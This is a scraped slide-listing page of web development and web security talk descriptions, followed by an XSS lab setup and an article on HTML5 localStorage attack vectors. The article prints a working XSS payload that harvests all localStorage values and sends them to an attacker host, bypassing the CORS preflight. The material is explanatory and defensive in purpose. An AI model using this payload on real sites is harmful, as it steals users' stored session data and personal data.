Hydra: A Vocabulary for Hypermedia-Driven Web APIsMarkus Lanthaler
Presentation of the paper "Hydra: A Vocabulary for Hypermedia-Driven Web APIs" at the 6th Workshop on Linked Data on the Web (LDOW2013) at the WWW2013 in Rio de Janeiro, Brazil
Introduction to AJAX, Reverse Ajax for beginners.
A presentation on Ajax, Reverse Ajax suitable for college level presentations and seminars.Contains 30 slides with example
Slides of my "Rapid JCR applications development with Sling" at ApacheCon EU 2009. Starts like the US 2008 version but uses a different example for the second part.
Kiến trúc phần mềm cho các site chịu tải lớn – Software architecture for high traffic Website
Case study giới thiệu về kiến trúc của một site traffic lớn đó là stackoverflow.com - trang hỏi đáp về lập trình rất nổi tiếng
Bài trình bày của bạn Ngô Xuân Hòa tại Meetup 4 của Ha Noi .NET Group.
Chi tiết vui lòng xem tại: http://tungnt.net
An online training course run by the FIWARE Foundation in conjunction with the i4Trust project. The core part of this virtual training camp (21-24 June 2021) covered all the necessary skills to develop smart solutions powered by FIWARE. It introduces the basis of Digital Twin programming using linked data concepts - JSON-LD and NGSI-LD and combines these with common smart data models for the sharing and augmentation of context data.
In addition, it covers the supplementary FIWARE technologies used to implement the common functions typically required when architecting a complete smart solution: Identity and Access Management (IAM) functions to secure access to digital twin data and functions enabling the interface with IoT and 3rd systems, or the connection with different tools for processing and monitoring current and historical big data.
This 12-hour online training course can be used to obtain a good understanding of FIWARE and NGSI Interfaces and form the basis of studying for the FIWARE expert certification.
Extending this core part, the virtual training camp adds introductory and deep-dive sessions on how FIWARE and iSHARE technologies, brought together under the umbrella of the i4Trust initiative, can be combined to provide the means for the creation of data spaces in which multiple organizations can exchange digital twin data in a trusted and efficient manner, collaborating in the creation of innovative services based on data sharing. In addition, SMEs and Digital Innovation Hubs (DIHs) that go through this complete training and are located in countries eligible under Horizon 2020 will be equipped with the necessary know-how to apply to the recently launched i4Trust Open Call.
Hydra: A Vocabulary for Hypermedia-Driven Web APIsMarkus Lanthaler
Presentation of the paper "Hydra: A Vocabulary for Hypermedia-Driven Web APIs" at the 6th Workshop on Linked Data on the Web (LDOW2013) at the WWW2013 in Rio de Janeiro, Brazil
Introduction to AJAX, Reverse Ajax for beginners.
A presentation on Ajax, Reverse Ajax suitable for college level presentations and seminars.Contains 30 slides with example
Slides of my "Rapid JCR applications development with Sling" at ApacheCon EU 2009. Starts like the US 2008 version but uses a different example for the second part.
Kiến trúc phần mềm cho các site chịu tải lớn – Software architecture for high traffic Website
Case study giới thiệu về kiến trúc của một site traffic lớn đó là stackoverflow.com - trang hỏi đáp về lập trình rất nổi tiếng
Bài trình bày của bạn Ngô Xuân Hòa tại Meetup 4 của Ha Noi .NET Group.
Chi tiết vui lòng xem tại: http://tungnt.net
An online training course run by the FIWARE Foundation in conjunction with the i4Trust project. The core part of this virtual training camp (21-24 June 2021) covered all the necessary skills to develop smart solutions powered by FIWARE. It introduces the basis of Digital Twin programming using linked data concepts - JSON-LD and NGSI-LD and combines these with common smart data models for the sharing and augmentation of context data.
In addition, it covers the supplementary FIWARE technologies used to implement the common functions typically required when architecting a complete smart solution: Identity and Access Management (IAM) functions to secure access to digital twin data and functions enabling the interface with IoT and 3rd systems, or the connection with different tools for processing and monitoring current and historical big data.
This 12-hour online training course can be used to obtain a good understanding of FIWARE and NGSI Interfaces and form the basis of studying for the FIWARE expert certification.
Extending this core part, the virtual training camp adds introductory and deep-dive sessions on how FIWARE and iSHARE technologies, brought together under the umbrella of the i4Trust initiative, can be combined to provide the means for the creation of data spaces in which multiple organizations can exchange digital twin data in a trusted and efficient manner, collaborating in the creation of innovative services based on data sharing. In addition, SMEs and Digital Innovation Hubs (DIHs) that go through this complete training and are located in countries eligible under Horizon 2020 will be equipped with the necessary know-how to apply to the recently launched i4Trust Open Call.
안드로이드 웹뷰의 모든것
이형욱
NAVER / Whale Core
웨일 브라우저 TL로 웨일 브라우저 개발 및 관련 기술을 연구하고 있습니다. 웹엔진 (WebKit, Blink) 오픈소스 활동을 하고 있으며, 현재 브라우저 렌더링 성능 및 메모리 최적화에 관심이 있습니다.
Model Your Application Domain, Not Your JSON StructuresMarkus Lanthaler
Presentation of the paper "Model Your Application Domain, Not Your JSON Structures" at the 4th International Workshop on RESTful Design (WS-REST 2013) at the WWW2013 in Rio de Janeiro, Brazil
JSON-LD is a set of W3C standards track specifications for representing Linked Data in JSON. It is fully compatible with the RDF data model, but allows developers to work with data entirely within JSON.
More information on JSON-LD can be found at http://json-ld.org/
Validating user input for accuracy and completeness helps in improving overall data quality. Angular and its form package turns up with a Validators class that has some beneficial validators like minLength, maxLength, required and pattern. However, occasionally if we wish to validate different fields under more complex/custom rules we can make optimum use of custom validator.
Defining custom validators while using Reactive Forms in Angular comes very easy as they are more of regular functions. One can conveniently generate function for custom validators within the component file in case the validator is not supposed to be used elsewhere.
A technical overview of JSON Web Token (JWT) and its JOSE underpinnings, which are poised to be the next generation identity token, as well as a look at using one open source implementation (jose4j).
Also some (bad) jokes.
Puppeteer can automate that! - FrontmaniaÖnder Ceylan
Puppeteer is a node library which provides a high-level API to control Chrome over the DevTools Protocol. When combined with the power of the web technologies, it can be used for automating image processing and batch file generation, creating automated visual testing with device emulation, tracking page loading performance, enforcing performance and code coverage budgets on CI, crawling a SPA, capturing a timeline trace of your site to help diagnose performance issues and more!
We'll explore those capabilities of Puppeteer API with combination of DevTools protocol and cloud functions (FaaS) with a showcase of real life use cases demonstrated by live-examples. Finally, we’ll go through the existing puppeteer based SaaS solutions such as Checkly and Browserless.
안드로이드 웹뷰의 모든것
이형욱
NAVER / Whale Core
웨일 브라우저 TL로 웨일 브라우저 개발 및 관련 기술을 연구하고 있습니다. 웹엔진 (WebKit, Blink) 오픈소스 활동을 하고 있으며, 현재 브라우저 렌더링 성능 및 메모리 최적화에 관심이 있습니다.
Model Your Application Domain, Not Your JSON StructuresMarkus Lanthaler
Presentation of the paper "Model Your Application Domain, Not Your JSON Structures" at the 4th International Workshop on RESTful Design (WS-REST 2013) at the WWW2013 in Rio de Janeiro, Brazil
JSON-LD is a set of W3C standards track specifications for representing Linked Data in JSON. It is fully compatible with the RDF data model, but allows developers to work with data entirely within JSON.
More information on JSON-LD can be found at http://json-ld.org/
Validating user input for accuracy and completeness helps in improving overall data quality. Angular and its form package turns up with a Validators class that has some beneficial validators like minLength, maxLength, required and pattern. However, occasionally if we wish to validate different fields under more complex/custom rules we can make optimum use of custom validator.
Defining custom validators while using Reactive Forms in Angular comes very easy as they are more of regular functions. One can conveniently generate function for custom validators within the component file in case the validator is not supposed to be used elsewhere.
A technical overview of JSON Web Token (JWT) and its JOSE underpinnings, which are poised to be the next generation identity token, as well as a look at using one open source implementation (jose4j).
Also some (bad) jokes.
Puppeteer can automate that! - FrontmaniaÖnder Ceylan
Puppeteer is a node library which provides a high-level API to control Chrome over the DevTools Protocol. When combined with the power of the web technologies, it can be used for automating image processing and batch file generation, creating automated visual testing with device emulation, tracking page loading performance, enforcing performance and code coverage budgets on CI, crawling a SPA, capturing a timeline trace of your site to help diagnose performance issues and more!
We'll explore those capabilities of Puppeteer API with combination of DevTools protocol and cloud functions (FaaS) with a showcase of real life use cases demonstrated by live-examples. Finally, we’ll go through the existing puppeteer based SaaS solutions such as Checkly and Browserless.
Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. The event is focused on introducing and teaching the 'Trust Rust can Entrust' on coding to Young developers and engineers who make the web better and more secure!, to train developers, students, mozillians and budding programmers on Rust. Never wrote a single line of code in Rust? Don’t worry, most of us are just starting off. The Rust programming language will be important to the future of the web, making it safe and great.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
http://www.powerofcommunity.net/pastcon_2008.html & http://xcon.xfocus.org/XCon2008/index.html
The Same Origin Policy is the most talked about security policy which relates to web applications, it is the constraint within browsers that ideally stops active content from different origins arbitrarily communicating with each other. This policy has given rise to the class of bugs known as Cross-Site Scripting (XSS) vulnerabilities, though a more accurate term is usually JavaScript injection, where the ability to force an application to echo crafted data gives an attacker the ability to execute JavaScript within the context of the vulnerable origin.
This talk takes the view that the biggest weakness with the Same Origin Policy is that it must be implemented by every component of the browser independently, and if any component implements it differently to other components then the security posture of the browser is altered. As such this talk will examine how the 'Same Origin Policy' is implemented in different circumstances, especially in active content, and where the Same Origin Policy is not really enforced at all.
Big Data Security Analytic Solution using SplunkIJERA Editor
Over the past decade, usage of online applications is experiencing remarkable growth. One of the main reasons for the success of web application is its “Ease of Access” and availability on internet. The simplicity of the HTTP protocol makes it easy to steal and spoof identity. The business liability associated with protecting online information has increased significantly and this is an issue that must be addressed. According to SANSTop20, 2013 list the number one targeted server side vulnerability are Web Applications. So, this has made detecting and preventing attacks on web applications a top priority for IT companies. In this paper, a rational solution is brought to detect events on web application and provides Security intelligence, log management and extensible reporting by analyzing web server logs.
Cross-site scripting (XSS) Attacks
Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs) into victim’s web browser.
Using this malicious code, the attackers can steal the victim’s credentials, such as cookies. The access control policies (i.e., the same origin policy) employed by the browser to protect those credentials can be bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale attacks.
To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web application named Elgg in our pre-built Ubuntu VM image. Elgg is an open-source web application for social networking, and it has implemented a number of countermeasures to remedy the XSS threat. To demonstrate how XSS attacks work, we have commented out these countermeasures in Elgg in our installation, intentionally making Elgg vulnerable to XSS attacks. Without the countermeasures, users can post any arbitrary message, including JavaScript programs, to the user profiles. In this lab, students need to exploit this vulnerability to launch an XSS attack on the modified Elgg, in a way that is similar to what Samy Kamkar did to MySpace in 2005 through the notorious Samy worm. The ultimate goal of this attack is to spread an XSS worm among the users, such that whoever views an infected user profile will be infected, and whoever is infected will add you (i.e., the attacker) to his/her friend list.
Environment setup for the problem:
For this problem, we will assume that you have set up the Ubuntu virtual machine environment based on the instructions in the Syllabus under “Special Software Installation Requirements”.
We will need the following:
· Firefox web browser
· Apache web server
· Elgg web application
For the Firefox browser, we need to use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses (available under the “Tools” menu in Firefox). The pre-built Ubuntu VM image provided to you has already installed the Firefox web browser with the required extension.
The Apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands:
% sudo apache2ctl start
or
% sudo service apache2 start
The Elgg web application is already set up in the pre-built Ubuntu VM image. We have also created several user accounts on the Elgg server and the credentials are given below (username, password):
admin, seedelgg
alice, seedalice
boby, seedboby
charlie, seedcharlie
samy, seedsamy
You can access the Elgg server using the following URL (the Apache server needs to be started first):
http://www.xsslabelgg.com
(this URL is only accessible from inside of the virtual machine, because we have modified the /etc/hostsfile to map the.
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
Hacking browser components by Reverse Engineering is emerging as the best way for discovering
potential vulnerabilities across web applications in an era of Rich Internet Applications (RIA). The RIA
space is flooded with technologies like HTML 5, Flex/Flash, Silverlight, extended DOM and numerous
third party libraries. Browsers are the target of hackers, worms and malware with specific scope, almost
on a daily basis. We have seen exploitation of these technologies on popular sites like Facebook, Twitter,
Yahoo, Google, to name a few. The traditional boundaries of web applications are disappearing.
Browsers today host a substantial part of web applications including data access, business logic,
encryption, etc. along with presentation layer. This shift is making browser components a potential
target for hackers. The danger of poorly written browser components being
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
Browsers are escalating their feature set to accommodate new specifications like HTML 5, XHR Level 2 and DOM Level 3. It is forming the backbone of next generation applications running on mobile, PDA devices or desktops. The blend of DOM (Remote Execution stack) , XHR L2 (Sockets for injections) and HTML5 (Exploit delivery platform) is becoming an easy victim for attackers and worms. We have already witnessed these types of attacks on popular sites like Twitter, Facebook and Yahoo. It is of the essence to understand attack surface and vectors to protect next generation applications. We have an enormous expansion of attack surface after inclusion of features like audio/video tags, drag/drop APIs, CSS-Opacity, localstorage, web workers, DOM selectors, Mouse gesturing, native JSON, Cross Site access controls, offline browsing, etc. This extension of attack surface and exposure of server side APIs allow attacker to perform following lethal attacks and abuses.
XHR abuse with attacking Cross Site access controls using level 2 calls
JSON manipulations and poisoning
DOM API injections and script executions
Abusing HTML5 tag structure and attributes
Localstorage manipulation and foreign site access
Attacking client side sandbox architectures
DOM scrubbing and logical abuse
Browser hijacking and exploitation through advanced DOM features
One-way CSRF and abusing vulnerable sites
DOM event injections and controlling (Clickjacking)
Hacking widgets, mashups and social networking sites
Abusing client side Web 2.0 and RIA libraries
We will be covering the above attacks and their variants in detail along with some real life cases and demonstrations. It is also important to understand methods of discovering these types of vulnerabilities across the application base. We will see some new scanning tools and approaches to identify some of these key issues.
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
Advanced Web Services Hacking - Attacks & Defense (AusCERT 2006).
Web services attacks are on the rise with evolution of web applications which are consuming back end web services over SOAP. UDDI, SOAP and WSDL are three important blocks of this new attack vectors. Several attacks are evolving around web services like UDDI enumeration, XPATH injection, XML poisoning, WSDL scanning, SOAP bruteforcing etc. At the same time new range of defense is evolving for web services with SOAP filtering. It is critical to know methodologies, attack vectors and defense strategies before deploying web services into the corporate environment. This paper will discuss advanced web services hacking methods and defense approaches.
1. HTML5 localstorage Attack Vectors & Security
By Shreeraj Shah (Blueinfy & iAppSecure)
Storage can expand the attack surface for application users. Storage brings both privacy and security
concerns for end clients within their browsers. It is imperative to have an appropriate defense and
proper protection in place to address this set of issues. The following attacks are possible:
Attack agent fetching sensitive information
LocalStorage is created on the physical hard drive and this file can be accessed by malware or virus that
has access to the underlying OS. For example, as in the case of Chrome, a SQLite file is created in the
user directory as shown below.
Figure 1 – Dir listing of localStorage SQLite files in the user directory in Chrome
It is easy to open files in any SQLite client application and see information stored by the application on
the local system as shown below.
Figure 2 – Viewing localStorage files in SQL client application
2. Hence, sensitive data stored on localstorage is at significant risk from various standpoints even though it
is of great value from a programming perspective.
Attack through XSS
XSS can be a lethal attack vector for storage. All storage would be accessible using JavaScript. A cookie
marked as HttpOnly would not available to and from JavaScript. But, with sessionStorage and
localStorage, the game changes a bit. Hence, if an application is discovered to be vulnerable to XSS, an
attacker can execute a payload to fetch all session and local storage values and send them back to his
own site. Sensitive information is compromised and the attacker gets access to the entire set of
interesting information. This XSS can be of any type – reflected, persistent or DOM-based.
For example, here is a simple payload.
var xmlhttp=false;
var ls = "";
if(localStorage.length){
console.log(localStorage.length)
for(i in localStorage){
ls += "("+i +"-"+localStorage.getItem(i)+")";
}
}
function sendreq()
{
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "http://attacker/msg/"+ls+"", true);
// Using text/plain to bypass preflight call
xmlhttp.setRequestHeader("Content-Type", "text/plain");
xmlhttp.send(ls);
}
sendreq();
Let’s look at the first loop shown below.
if(localStorage.length){
console.log(localStorage.length)
for(i in localStorage){
ls += "("+i +"-"+localStorage.getItem(i)+")";
}
}
3. In this loop all variables from localStorage can be obtained using getItem() call and values can be fetched
along with the key. All of these get stored in the “ls” variable as shown below.
/
Figure 3 – Enumerating the contents of the variable “ls”
In the next call, the attacker can send this harvested value back to his own server and use the XHR call
with “text/plain” to bypass pre-flight call as shown below.
function sendreq()
{
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "http://attacker/msg/"+ls+"", true);
// Using text/plain to bypass preflight call
xmlhttp.setRequestHeader("Content-Type", "text/plain");
xmlhttp.send(ls);
}
Finally, when the sendreq() call is made, the attacker gets the following response on the browser stack.
Figure 4 – browser stack response to the sendreq() call
4. Hence, the attacker is successful in enumerating values and sending them back to the server. It is
possible to apply the same routine to sessionStorage as well using that object. This technique is a
completely blind enumeration. No information is required for the application; if the application uses the
localStorage object, then loop through all objects to fetch values based on the type as shown below.
for(i in localStorage){
ls += "("+i +"-"+localStorage.getItem(i)+")";
}
It is important to note that applications running with HTML5 use single DOM and when the attacker
finds DOM-based access then it is child’s play for him to inject and exploit DOM-based calls. These calls
could come from a third party server or the content could come from untrusted sources.
Tracking user and invading privacy
LocalStorage is permanent and it gets glued to the browser. An attacker or an advertising company can
drop a localStorage identifier for a specific domain and then have full tracking available through APIs.
These API calls can be passed to their respective sites to track users across the world since it is glued to
single browser. A company with multiple server access as an ad server can start tracking a user from a
single domain and craft their advertising game plan. This invades the privacy of the user. Using
localStorage, a user could be mapped to his/her real identity and would allow persistent tracking using
JavaScript. Currently, the privacy area is a little ignored from HTML5 point of view; in future this may be
a cause of concern for an end user.
DNS spoofing attack vector
LocalStorage is accessible based on the origin or domain. Hence, if DNS is spoofed, the attacker gets
access to the browser session. In this case the localStorage created by targetting the application can
provide access to the sensitive data stored on the browser. This can lead to a potential security breach
and data theft. For example, if a bank stores an identifier, profile and the last 5 transactions on the
localStorage, the attacker can get access to this sensitive set of information via DNS spoofing at the ISP
end. The application should defend their implementation by using TLS and that should ensure that the
correct certificate is present before communicating and executing JavaScript on the browser session.
About Author
Shreeraj Shah
Founder & Director
Blueinfy and iAppSecure
www.blueinfy.com | www.iappsecure.com
Blog: http://shreeraj.blogspot.com
Twitter: @shreeraj
